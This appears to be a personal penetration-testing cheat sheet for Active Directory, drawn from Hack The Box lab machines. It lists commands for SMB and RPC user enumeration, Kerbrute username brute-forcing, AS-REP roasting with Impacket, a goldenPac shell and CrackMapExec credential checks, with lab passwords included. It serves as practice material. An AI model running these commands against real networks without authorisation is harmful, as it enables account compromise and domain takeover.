Active Directory
Active Directory Tools and Stuff
smbclient
The smbclient utility is the Swiss Army knife of Linux-to-NT tools. This command lets you send messages to workstations, display browse lists and connect to SMB shares
smbmap -H 10.129.148.199
smbclient -N -L //10.129.148.199
smbmap -H 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
rpcclient
rpcclient
is a tool for executing client side MS-RPC functions.
Anonymous login
rpcclient -U '' -N 10.129.148.19 # -N for no password -U for username
Login with credentials
$ rpcclient -U htb.local/james 10.129.148.199
Enter HTB.LOCAL\james's password:
rpcclient $> enumdom
enumdomains enumdomgroups enumdomusers
rpcclient $> enumdom
enumdomains enumdomgroups enumdomusers
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $>
Kerbrute
A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication
./kerbrute userenum --domain htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.52
Impacket-Tools
sudo apt install python3-impacket
To connect mssql
impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.129.148.199'
Dump a list of ASP-REP vulnerable users by credentials with GetNPUsers
impacket-GetNPUsers 'htb.local/james:J@m3s_P@ssW0rd!' -dc-ip 10.129.148.199
Getting a shell with generated kerbrute tickets. (Learn in HTB-Mantis)
impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Crackmapexec
https://github.com/byt3bl33d3r/CrackMapExec
Documentation: https://mpgn.gitbook.io/crackmapexec/
crackmpexec is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
Checking valid user for smb
crackmapexec smb 10.129.148.199 -u 'James' -p 'J@m3s_P@ssW0rd!'
Last updated